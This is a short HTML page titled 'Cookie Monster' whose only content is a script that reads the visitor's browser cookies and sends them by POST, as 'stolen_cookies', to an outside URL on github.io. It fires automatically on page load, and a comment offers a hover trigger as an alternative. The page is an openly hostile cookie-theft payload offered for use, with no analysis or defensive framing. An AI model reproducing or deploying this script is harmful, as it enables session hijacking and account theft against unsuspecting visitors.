<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cookie Monster</title>
</head>
<body>
    <script>
        function stealCookies() {
            var cookies = document.cookie;
            var xmlHttp = new XMLHttpRequest();
            xmlHttp.open("POST", "https://db011.github.io/idk-test-maye/cookie_store", false);
            xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            xmlHttp.send('stolen_cookies=' + encodeURIComponent(cookies));
        }

        // Replace "onload" with "onmouseover" if you want the script to trigger when hovering over the page
        window.onload = stealCookies;
    </script>
</body>
</html>
